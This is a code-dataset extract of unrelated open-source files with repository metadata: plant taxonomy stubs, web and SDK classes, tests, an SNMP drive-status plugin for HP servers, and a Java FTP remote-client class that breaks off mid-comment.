code | repo_name | path | language | license | size
---|---|---|---|---|---
# Cercanthemum squamiferum Tiegh. SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Malpighiales/Ochnaceae/Cercanthemum/Cercanthemum squamiferum/README.md | Markdown | apache-2.0 | 181 |
# Strobilanthes hirsuta Decne. SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Lamiales/Acanthaceae/Strobilanthes/Strobilanthes hirsuta/README.md | Markdown | apache-2.0 | 178 |
# Matayba atropurpurea Radlk. SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Magnoliophyta/Magnoliopsida/Sapindales/Sapindaceae/Matayba/Matayba atropurpurea/README.md | Markdown | apache-2.0 | 177 |
# Nephelea arborea (L.) Sehnem SPECIES
#### Status
ACCEPTED
#### According to
International Plant Names Index
#### Published in
null
#### Original name
null
### Remarks
null | mdoering/backbone | life/Plantae/Pteridophyta/Polypodiopsida/Cyatheales/Cyatheaceae/Nephelea/Nephelea arborea/README.md | Markdown | apache-2.0 | 178 |
<!-- Portfolio Grid Section -->
<section id="portfolio" class="bg-light-gray">
<div class="container">
<div class="row">
<div class="col-lg-12 text-center">
<h2 class="section-heading">Portfolio</h2>
<h3 class="section-subheading text-muted"></h3>
</div>
</div>
<div class="row">
{% for post in site.posts %}
<div class="col-md-4 col-sm-6 portfolio-item">
<a href="#portfolioModal{{ post.modal-id }}" class="portfolio-link" data-toggle="modal">
<div class="portfolio-hover">
<div class="portfolio-hover-content">
<i class="fa fa-plus fa-3x"></i>
</div>
</div>
<img src="img/portfolio/{{ post.thumbnail }}" class="img-responsive img-centered" alt="{{ post.alt }}">
</a>
<div class="portfolio-caption">
<h4>{{ post.title }}</h4>
<p class="text-muted">{{ post.subtitle }}</p>
</div>
</div>
{% endfor %}
</div>
</div>
</section>
| nicoletufts/nicoletufts.github.io | _includes/portfolio_grid.html | HTML | apache-2.0 | 1,307 |
/*
* Copyright 2019 ThoughtWorks, Inc.
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
import {ApiRequestBuilder, ApiVersion} from "helpers/api_request_builder";
import SparkRoutes from "helpers/spark_routes";
export interface BulkUpdateSystemAdminJSON {
operations: {
users: {
add?: string[],
remove?: string[]
}
};
}
export class AdminsCRUD {
static API_VERSION_HEADER = ApiVersion.v2;
static all() {
return ApiRequestBuilder.GET(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER);
}
static bulkUpdate(bulkUpdateSystemAdminJson: BulkUpdateSystemAdminJSON) {
return ApiRequestBuilder.PATCH(SparkRoutes.apisystemAdminsPath(), this.API_VERSION_HEADER, {payload: bulkUpdateSystemAdminJson});
}
}
| jyotisingh/gocd | server/webapp/WEB-INF/rails/webpack/models/admins/admin_crud.ts | TypeScript | apache-2.0 | 1,266 |
/*
* Copyright 2014-2019 Amazon.com, Inc. or its affiliates. All Rights Reserved.
*
* Licensed under the Apache License, Version 2.0 (the "License"). You may not use this file except in compliance with
* the License. A copy of the License is located at
*
* http://aws.amazon.com/apache2.0
*
* or in the "license" file accompanying this file. This file is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR
* CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions
* and limitations under the License.
*/
package com.amazonaws.services.iotevents.model;
import java.io.Serializable;
import javax.annotation.Generated;
/**
*
* @see <a href="http://docs.aws.amazon.com/goto/WebAPI/iotevents-2018-07-27/UntagResource" target="_top">AWS API
* Documentation</a>
*/
@Generated("com.amazonaws:aws-java-sdk-code-generator")
public class UntagResourceResult extends com.amazonaws.AmazonWebServiceResult<com.amazonaws.ResponseMetadata> implements Serializable, Cloneable {
/**
* Returns a string representation of this object. This is useful for testing and debugging. Sensitive data will be
* redacted from this string using a placeholder value.
*
* @return A string representation of this object.
*
* @see java.lang.Object#toString()
*/
@Override
public String toString() {
StringBuilder sb = new StringBuilder();
sb.append("{");
sb.append("}");
return sb.toString();
}
@Override
public boolean equals(Object obj) {
if (this == obj)
return true;
if (obj == null)
return false;
if (obj instanceof UntagResourceResult == false)
return false;
UntagResourceResult other = (UntagResourceResult) obj;
return true;
}
@Override
public int hashCode() {
final int prime = 31;
int hashCode = 1;
return hashCode;
}
@Override
public UntagResourceResult clone() {
try {
return (UntagResourceResult) super.clone();
} catch (CloneNotSupportedException e) {
throw new IllegalStateException("Got a CloneNotSupportedException from Object.clone() " + "even though we're Cloneable!", e);
}
}
}
| jentfoo/aws-sdk-java | aws-java-sdk-iotevents/src/main/java/com/amazonaws/services/iotevents/model/UntagResourceResult.java | Java | apache-2.0 | 2,326 |
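A minimal sketch of the value-object contract implemented by the generated `UntagResourceResult` above: with no fields to compare, `equals` treats any two instances as equal, `hashCode` is constant, `clone` copies via `Cloneable`, and `toString` prints `{}`. Only members defined in the file are used; the demo class itself is illustrative.

```java
import com.amazonaws.services.iotevents.model.UntagResourceResult;

public class UntagResourceResultDemo {
    public static void main(String[] args) {
        UntagResourceResult a = new UntagResourceResult();
        UntagResourceResult b = a.clone();                 // copy via Cloneable
        System.out.println(a.equals(b));                   // true: no fields to compare
        System.out.println(a.hashCode() == b.hashCode());  // true: constant hash
        System.out.println(a);                             // "{}" from toString()
    }
}
```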
// Copyright (c) kuicker.org. All rights reserved.
// Modified By YYYY-MM-DD
// kevinjong 2016-02-11 - Creation
using System.IO;
using System.Linq;
using Xunit;
namespace IsTo.Tests
{
public class TestHelper
{
internal static void StreamComparison(
Stream stream1,
Stream stream2)
{
var bufferSize = 2048;
var buffer1 = new byte[bufferSize];
var buffer2 = new byte[bufferSize];
while(true) {
var count1 = stream1.Read(buffer1, 0, bufferSize);
var count2 = stream2.Read(buffer2, 0, bufferSize);
Assert.True(count1 == count2);
if(count1 == 0) { return; }
Assert.True(
buffer1
.Take(count1)
.SequenceEqual(buffer2.Take(count2))
);
}
}
}
}
| Kuick/IsTo | IsTo.Tests/Misc/TestHelper.cs | C# | apache-2.0 | 765 |
/*
* Copyright 2020 Google LLC
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* https://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
// Generated by the protocol buffer compiler. DO NOT EDIT!
// source: google/cloud/aiplatform/v1/model_service.proto
package com.google.cloud.aiplatform.v1;
/**
*
*
* <pre>
* Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation.
* </pre>
*
* Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse}
*/
public final class ExportModelResponse extends com.google.protobuf.GeneratedMessageV3
implements
// @@protoc_insertion_point(message_implements:google.cloud.aiplatform.v1.ExportModelResponse)
ExportModelResponseOrBuilder {
private static final long serialVersionUID = 0L;
// Use ExportModelResponse.newBuilder() to construct.
private ExportModelResponse(com.google.protobuf.GeneratedMessageV3.Builder<?> builder) {
super(builder);
}
private ExportModelResponse() {}
@java.lang.Override
@SuppressWarnings({"unused"})
protected java.lang.Object newInstance(UnusedPrivateParameter unused) {
return new ExportModelResponse();
}
@java.lang.Override
public final com.google.protobuf.UnknownFieldSet getUnknownFields() {
return this.unknownFields;
}
private ExportModelResponse(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
this();
if (extensionRegistry == null) {
throw new java.lang.NullPointerException();
}
com.google.protobuf.UnknownFieldSet.Builder unknownFields =
com.google.protobuf.UnknownFieldSet.newBuilder();
try {
boolean done = false;
while (!done) {
int tag = input.readTag();
switch (tag) {
case 0:
done = true;
break;
default:
{
if (!parseUnknownField(input, unknownFields, extensionRegistry, tag)) {
done = true;
}
break;
}
}
}
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
throw e.setUnfinishedMessage(this);
} catch (java.io.IOException e) {
throw new com.google.protobuf.InvalidProtocolBufferException(e).setUnfinishedMessage(this);
} finally {
this.unknownFields = unknownFields.build();
makeExtensionsImmutable();
}
}
public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.google.cloud.aiplatform.v1.ExportModelResponse.class,
com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class);
}
private byte memoizedIsInitialized = -1;
@java.lang.Override
public final boolean isInitialized() {
byte isInitialized = memoizedIsInitialized;
if (isInitialized == 1) return true;
if (isInitialized == 0) return false;
memoizedIsInitialized = 1;
return true;
}
@java.lang.Override
public void writeTo(com.google.protobuf.CodedOutputStream output) throws java.io.IOException {
unknownFields.writeTo(output);
}
@java.lang.Override
public int getSerializedSize() {
int size = memoizedSize;
if (size != -1) return size;
size = 0;
size += unknownFields.getSerializedSize();
memoizedSize = size;
return size;
}
@java.lang.Override
public boolean equals(final java.lang.Object obj) {
if (obj == this) {
return true;
}
if (!(obj instanceof com.google.cloud.aiplatform.v1.ExportModelResponse)) {
return super.equals(obj);
}
com.google.cloud.aiplatform.v1.ExportModelResponse other =
(com.google.cloud.aiplatform.v1.ExportModelResponse) obj;
if (!unknownFields.equals(other.unknownFields)) return false;
return true;
}
@java.lang.Override
public int hashCode() {
if (memoizedHashCode != 0) {
return memoizedHashCode;
}
int hash = 41;
hash = (19 * hash) + getDescriptor().hashCode();
hash = (29 * hash) + unknownFields.hashCode();
memoizedHashCode = hash;
return hash;
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.nio.ByteBuffer data) throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.nio.ByteBuffer data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.ByteString data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.ByteString data,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(byte[] data)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
byte[] data, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return PARSER.parseFrom(data, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.io.InputStream input) throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
PARSER, input, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom(
java.io.InputStream input) throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(PARSER, input);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseDelimitedFrom(
java.io.InputStream input, com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseDelimitedWithIOException(
PARSER, input, extensionRegistry);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.CodedInputStream input) throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(PARSER, input);
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse parseFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
return com.google.protobuf.GeneratedMessageV3.parseWithIOException(
PARSER, input, extensionRegistry);
}
@java.lang.Override
public Builder newBuilderForType() {
return newBuilder();
}
public static Builder newBuilder() {
return DEFAULT_INSTANCE.toBuilder();
}
public static Builder newBuilder(com.google.cloud.aiplatform.v1.ExportModelResponse prototype) {
return DEFAULT_INSTANCE.toBuilder().mergeFrom(prototype);
}
@java.lang.Override
public Builder toBuilder() {
return this == DEFAULT_INSTANCE ? new Builder() : new Builder().mergeFrom(this);
}
@java.lang.Override
protected Builder newBuilderForType(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
Builder builder = new Builder(parent);
return builder;
}
/**
*
*
* <pre>
* Response message of [ModelService.ExportModel][google.cloud.aiplatform.v1.ModelService.ExportModel] operation.
* </pre>
*
* Protobuf type {@code google.cloud.aiplatform.v1.ExportModelResponse}
*/
public static final class Builder extends com.google.protobuf.GeneratedMessageV3.Builder<Builder>
implements
// @@protoc_insertion_point(builder_implements:google.cloud.aiplatform.v1.ExportModelResponse)
com.google.cloud.aiplatform.v1.ExportModelResponseOrBuilder {
public static final com.google.protobuf.Descriptors.Descriptor getDescriptor() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor;
}
@java.lang.Override
protected com.google.protobuf.GeneratedMessageV3.FieldAccessorTable
internalGetFieldAccessorTable() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_fieldAccessorTable
.ensureFieldAccessorsInitialized(
com.google.cloud.aiplatform.v1.ExportModelResponse.class,
com.google.cloud.aiplatform.v1.ExportModelResponse.Builder.class);
}
// Construct using com.google.cloud.aiplatform.v1.ExportModelResponse.newBuilder()
private Builder() {
maybeForceBuilderInitialization();
}
private Builder(com.google.protobuf.GeneratedMessageV3.BuilderParent parent) {
super(parent);
maybeForceBuilderInitialization();
}
private void maybeForceBuilderInitialization() {
if (com.google.protobuf.GeneratedMessageV3.alwaysUseFieldBuilders) {}
}
@java.lang.Override
public Builder clear() {
super.clear();
return this;
}
@java.lang.Override
public com.google.protobuf.Descriptors.Descriptor getDescriptorForType() {
return com.google.cloud.aiplatform.v1.ModelServiceProto
.internal_static_google_cloud_aiplatform_v1_ExportModelResponse_descriptor;
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() {
return com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance();
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse build() {
com.google.cloud.aiplatform.v1.ExportModelResponse result = buildPartial();
if (!result.isInitialized()) {
throw newUninitializedMessageException(result);
}
return result;
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse buildPartial() {
com.google.cloud.aiplatform.v1.ExportModelResponse result =
new com.google.cloud.aiplatform.v1.ExportModelResponse(this);
onBuilt();
return result;
}
@java.lang.Override
public Builder clone() {
return super.clone();
}
@java.lang.Override
public Builder setField(
com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
return super.setField(field, value);
}
@java.lang.Override
public Builder clearField(com.google.protobuf.Descriptors.FieldDescriptor field) {
return super.clearField(field);
}
@java.lang.Override
public Builder clearOneof(com.google.protobuf.Descriptors.OneofDescriptor oneof) {
return super.clearOneof(oneof);
}
@java.lang.Override
public Builder setRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field, int index, java.lang.Object value) {
return super.setRepeatedField(field, index, value);
}
@java.lang.Override
public Builder addRepeatedField(
com.google.protobuf.Descriptors.FieldDescriptor field, java.lang.Object value) {
return super.addRepeatedField(field, value);
}
@java.lang.Override
public Builder mergeFrom(com.google.protobuf.Message other) {
if (other instanceof com.google.cloud.aiplatform.v1.ExportModelResponse) {
return mergeFrom((com.google.cloud.aiplatform.v1.ExportModelResponse) other);
} else {
super.mergeFrom(other);
return this;
}
}
public Builder mergeFrom(com.google.cloud.aiplatform.v1.ExportModelResponse other) {
if (other == com.google.cloud.aiplatform.v1.ExportModelResponse.getDefaultInstance())
return this;
this.mergeUnknownFields(other.unknownFields);
onChanged();
return this;
}
@java.lang.Override
public final boolean isInitialized() {
return true;
}
@java.lang.Override
public Builder mergeFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws java.io.IOException {
com.google.cloud.aiplatform.v1.ExportModelResponse parsedMessage = null;
try {
parsedMessage = PARSER.parsePartialFrom(input, extensionRegistry);
} catch (com.google.protobuf.InvalidProtocolBufferException e) {
parsedMessage =
(com.google.cloud.aiplatform.v1.ExportModelResponse) e.getUnfinishedMessage();
throw e.unwrapIOException();
} finally {
if (parsedMessage != null) {
mergeFrom(parsedMessage);
}
}
return this;
}
@java.lang.Override
public final Builder setUnknownFields(final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.setUnknownFields(unknownFields);
}
@java.lang.Override
public final Builder mergeUnknownFields(
final com.google.protobuf.UnknownFieldSet unknownFields) {
return super.mergeUnknownFields(unknownFields);
}
// @@protoc_insertion_point(builder_scope:google.cloud.aiplatform.v1.ExportModelResponse)
}
// @@protoc_insertion_point(class_scope:google.cloud.aiplatform.v1.ExportModelResponse)
private static final com.google.cloud.aiplatform.v1.ExportModelResponse DEFAULT_INSTANCE;
static {
DEFAULT_INSTANCE = new com.google.cloud.aiplatform.v1.ExportModelResponse();
}
public static com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstance() {
return DEFAULT_INSTANCE;
}
private static final com.google.protobuf.Parser<ExportModelResponse> PARSER =
new com.google.protobuf.AbstractParser<ExportModelResponse>() {
@java.lang.Override
public ExportModelResponse parsePartialFrom(
com.google.protobuf.CodedInputStream input,
com.google.protobuf.ExtensionRegistryLite extensionRegistry)
throws com.google.protobuf.InvalidProtocolBufferException {
return new ExportModelResponse(input, extensionRegistry);
}
};
public static com.google.protobuf.Parser<ExportModelResponse> parser() {
return PARSER;
}
@java.lang.Override
public com.google.protobuf.Parser<ExportModelResponse> getParserForType() {
return PARSER;
}
@java.lang.Override
public com.google.cloud.aiplatform.v1.ExportModelResponse getDefaultInstanceForType() {
return DEFAULT_INSTANCE;
}
}
| googleapis/java-aiplatform | proto-google-cloud-aiplatform-v1/src/main/java/com/google/cloud/aiplatform/v1/ExportModelResponse.java | Java | apache-2.0 | 16,200 |
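A minimal round-trip sketch for the `ExportModelResponse` message above, using `getDefaultInstance()` and `parseFrom(byte[])` from the file plus `toByteArray()` inherited from the protobuf base class; since the message declares no fields, the wire form is empty. The demo class is illustrative only.

```java
import com.google.cloud.aiplatform.v1.ExportModelResponse;

public class ExportModelResponseDemo {
    public static void main(String[] args) throws Exception {
        ExportModelResponse original = ExportModelResponse.getDefaultInstance();
        byte[] wire = original.toByteArray();         // inherited from GeneratedMessageV3
        ExportModelResponse parsed = ExportModelResponse.parseFrom(wire);
        System.out.println(original.equals(parsed));  // true
        System.out.println(wire.length);              // 0: message has no fields
    }
}
```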
/*!
* Module requirements
*/
var NeopreneError = require('../error')
/**
* Document Validation Error
*
* @api private
* @param {Document} instance
* @inherits NeopreneError
*/
function ValidationError (instance) {
NeopreneError.call(this, "Validation failed");
Error.captureStackTrace(this, arguments.callee);
this.name = 'ValidationError';
this.errors = instance.errors = {};
};
/**
* Console.log helper
* @api private
*/
ValidationError.prototype.toString = function () {
return this.name + ': ' + Object.keys(this.errors).map(function (key) {
return String(this.errors[key]);
}, this).join(', ');
};
/*!
* Inherits from NeopreneError.
*/
ValidationError.prototype.__proto__ = NeopreneError.prototype;
/*!
* Module exports
*/
module.exports = exports = ValidationError;
| rorymadden/neoprene | lib/errors/validation.js | JavaScript | apache-2.0 | 813 |
package com.twitter.tiny
import com.google.inject.Stage
import com.twitter.finatra.http.test.EmbeddedHttpServer
import com.twitter.inject.server.FeatureTest
class TinyUrlServerStartupTest extends FeatureTest {
override val server = new EmbeddedHttpServer(
stage = Stage.PRODUCTION,
twitterServer = new TinyUrlServer)
"Server" should {
"startup" in {
server.assertAppStarted()
}
}
}
| joecwu/finatra | examples/tiny-url/src/test/scala/com/twitter/tiny/TinyUrlServerStartupTest.scala | Scala | apache-2.0 | 414 |
#
# Copyright 2019 Centreon (http://www.centreon.com/)
#
# Centreon is a full-fledged industry-strength solution that meets
# the needs in IT infrastructure and application monitoring for
# service performance.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
package hardware::server::hp::proliant::snmp::mode::components::daldrive;
use strict;
use warnings;
my %map_daldrive_condition = (
1 => 'other',
2 => 'ok',
3 => 'degraded',
4 => 'failed',
);
my %map_ldrive_status = (
1 => 'other',
2 => 'ok',
3 => 'failed',
4 => 'unconfigured',
5 => 'recovering',
6 => 'readyForRebuild',
7 => 'rebuilding',
8 => 'wrongDrive',
9 => 'badConnect',
10 => 'overheating',
11 => 'shutdown',
12 => 'expanding',
13 => 'notAvailable',
14 => 'queuedForExpansion',
15 => 'multipathAccessDegraded',
16 => 'erasing',
);
my %map_faulttol = (
1 => 'other',
2 => 'none',
3 => 'mirroring',
4 => 'dataGuard',
5 => 'distribDataGuard',
7 => 'advancedDataGuard',
8 => 'raid50',
9 => 'raid60',
);
# In 'CPQIDA-MIB.mib'
my $mapping = {
cpqDaLogDrvFaultTol => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.3', map => \%map_faulttol },
cpqDaLogDrvStatus => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.4', map => \%map_ldrive_status },
};
my $mapping2 = {
cpqDaLogDrvCondition => { oid => '.1.3.6.1.4.1.232.3.2.3.1.1.11', map => \%map_daldrive_condition },
};
my $oid_cpqDaLogDrvEntry = '.1.3.6.1.4.1.232.3.2.3.1.1';
my $oid_cpqDaLogDrvCondition = '.1.3.6.1.4.1.232.3.2.3.1.1.11';
sub load {
my ($self) = @_;
push @{$self->{request}}, { oid => $oid_cpqDaLogDrvEntry, start => $mapping->{cpqDaLogDrvFaultTol}->{oid}, end => $mapping->{cpqDaLogDrvStatus}->{oid} },
{ oid => $oid_cpqDaLogDrvCondition };
}
sub check {
my ($self) = @_;
$self->{output}->output_add(long_msg => "Checking da logical drives");
$self->{components}->{daldrive} = {name => 'da logical drives', total => 0, skip => 0};
return if ($self->check_filter(section => 'daldrive'));
foreach my $oid ($self->{snmp}->oid_lex_sort(keys %{$self->{results}->{$oid_cpqDaLogDrvCondition}})) {
next if ($oid !~ /^$mapping2->{cpqDaLogDrvCondition}->{oid}\.(.*)$/);
my $instance = $1;
my $result = $self->{snmp}->map_instance(mapping => $mapping, results => $self->{results}->{$oid_cpqDaLogDrvEntry}, instance => $instance);
my $result2 = $self->{snmp}->map_instance(mapping => $mapping2, results => $self->{results}->{$oid_cpqDaLogDrvCondition}, instance => $instance);
next if ($self->check_filter(section => 'daldrive', instance => $instance));
$self->{components}->{daldrive}->{total}++;
$self->{output}->output_add(long_msg => sprintf("da logical drive '%s' [fault tolerance: %s, condition: %s] status is %s.",
$instance,
$result->{cpqDaLogDrvFaultTol},
$result2->{cpqDaLogDrvCondition},
$result->{cpqDaLogDrvStatus}));
my $exit = $self->get_severity(section => 'daldrive', value => $result->{cpqDaLogDrvStatus});
if (!$self->{output}->is_status(value => $exit, compare => 'ok', litteral => 1)) {
$self->{output}->output_add(severity => $exit,
short_msg => sprintf("da logical drive '%s' is %s",
$instance, $result->{cpqDaLogDrvStatus}));
}
}
}
1; | Sims24/centreon-plugins | hardware/server/hp/proliant/snmp/mode/components/daldrive.pm | Perl | apache-2.0 | 4,072 |
/*
* Copyright 2005-2010 Ignis Software Tools Ltd. All rights reserved.
*/
package com.aqua.filetransfer.ftp;
import java.io.File;
import java.io.FileInputStream;
import java.util.Properties;
import jsystem.framework.JSystemProperties;
import jsystem.framework.system.SystemObjectImpl;
import jsystem.utils.FileUtils;
import jsystem.utils.ReflectionUtils;
import jsystem.utils.StringUtils;
import systemobject.terminal.Cli;
import systemobject.terminal.Prompt;
import com.aqua.sysobj.conn.CliConnection;
import com.aqua.sysobj.conn.CliConnectionImpl;
import com.aqua.sysobj.conn.CliFactory;
/**
 * <b>SystemObject for running an FTP client on a remote machine.</b><br>
* The main purpose of this system object is to enable file transfer
* without assuming an FTP server is running on the remote machine.<br>
* In a typical usage of this SystemObject, an embedded FTP server
* will be activated on the local machine.
 * A {@link Cli} session is opened with the remote client; the session
 * activates the FTP client on the remote machine.<br>
*
* <u>Using FTPRemoteClient</u><br>
 * The SystemObject can be instantiated from the SUT file or directly in code.
 * Once initialized, the copy operations can be used.
 * Each copy operation checks whether a connection is already open; if not,
 * a connection is opened.<br>
 * In many cases the remote server (telnet/ssh) limits the number of connections;
 * use {@link #closeFTPSession()} to close the connection when needed.<br>
*
 * Passivation: since TAS 4.9 the system object supports passivation. Please note that passivation
 * is only supported when the remote client is a Linux machine.
 * In case the built-in prompts are not enough to open an FTP session
 * with the FTP server you are using, the system object also supports adding additional FTP prompts.
 * To do that, write a property file called {@link #FILE_TRANSFER_PROPERTIES_FILE_NAME}
* (in run directory) and add to it the following properties:
 * {@link #FTP_LOGIN_PROMPTS} - comma-separated prompts which identify that
 * the FTP server waits for the user to enter the login user name
 *
 * {@link #FTP_PASSWORD_PROMPTS} - comma-separated prompts which identify that
 * the FTP server waits for the user to enter the password
 *
 * {@link #FTP_PROMPTS} - comma-separated prompts which identify that
 * the FTP server is waiting for an ftp command
*
 * Since TAS 4.9, cli connectivity parameters can be set using CliConnection.
* This can be done either by passing a CliConnection to the FtpRemoteClient constructor
* or setting the <code>cliConnection</code> member through the SUT file.
* When connectivity parameters are set using a CliConnection other connectivity
* parameters are ignored (host,operatingSystem,protocol,port,user,password).
*
* FTP Server address:
* -------------------
 * The FTP server address is fetched as follows:
 * If the user gave a value to the member {@link #ftpServerHostName} through the SUT file
 * or by invoking its setter, this will be the server to which the remote ftp client will
 * try to connect.
 * Next, when connecting, the system object will try to fetch the property {@value #LOCAL_HOST_ADDRESS_PROPERTY}
 * from the jsystem.properties file; if the property was set it will use it as the server address;
 * otherwise, the system object uses the Java API to get the local machine host name and uses it as the server address.
*/
public class FTPRemoteClient extends SystemObjectImpl {
public static final String FILE_TRANSFER_PROPERTIES_FILE_NAME = "filetransfer.properties";
public static final String FTP_PROMPTS = "ftp.prompts";
public static final String FTP_LOGIN_PROMPTS = "ftp.login.prompts";
public static final String FTP_PASSWORD_PROMPTS = "ftp.password.prompts";
public static final String LOCAL_HOST_ADDRESS_PROPERTY = "local.host.external.name";
public CliConnection cliConnection;
private Cli cli;
private String host;
private String operatingSystem = CliFactory.OPERATING_SYSTEM_WINDOWS;
private String protocol = "telnet";
private int port = 23;
private String user;
private String password;
private String ftpServerHostName;
private String ftpUserName="aqua";
private String ftpPassword="aqua";
private boolean ascii ;
private Prompt[] ftpGeneralPrompts;
private Prompt[] ftpLoginPrompts;
private Prompt[] ftpPasswordPrompts;
private java.net.InetAddress localMachine;
private boolean promptOn = true;
/**
*/
public FTPRemoteClient(CliConnection cliConn,String ftpServerHostName) throws Exception{
cliConnection = cliConn;
setFtpServerHostName(ftpServerHostName);
}
/**
 * Constructs an FTPRemoteClient that uses the local machine as the remote machine.<br>
* Used for testing purposes.
*/
public FTPRemoteClient() throws Exception{
localMachine = java.net.InetAddress.getLocalHost();
setHost(localMachine.getHostName());
}
/**
 * Constructs an FTPRemoteClient where the remote machine is this machine.
* The FTPRemoteClient assumes Aqua's embedded FTP server is running on
* this machine.
*/
public FTPRemoteClient(String user,String password) throws Exception {
this();
setUser(user);
setPassword(password);
}
/**
 * Constructs an FTPRemoteClient where the remote machine is <code>host</code>.
* The FTPRemoteClient assumes Aqua's embedded FTP server is running on
* this machine.
*/
public FTPRemoteClient(String host,String telnetUser,String telnetPassword,String ftpServerHostName) throws Exception{
this(telnetUser,telnetPassword);
setHost(host);
setFtpServerHostName(ftpServerHostName);
}
/**
* Initializes {@link FTPRemoteClient} members and verifies that
* a telnet connection can be opened to the remote client and
* that the remote client can open a FTP connection to the server.<br>
* All connections are closed when initialization is done.
* @see SystemObjectImpl#init()
*/
public void init() throws Exception {
super.init();
initPrompts();
}
/**
* Closes connection to remote machine.
*/
public void closeFTPSession(){
closeFtp();
closeCli();
}
/**
 * Copies a file from the FTP server machine (in most cases the local machine)
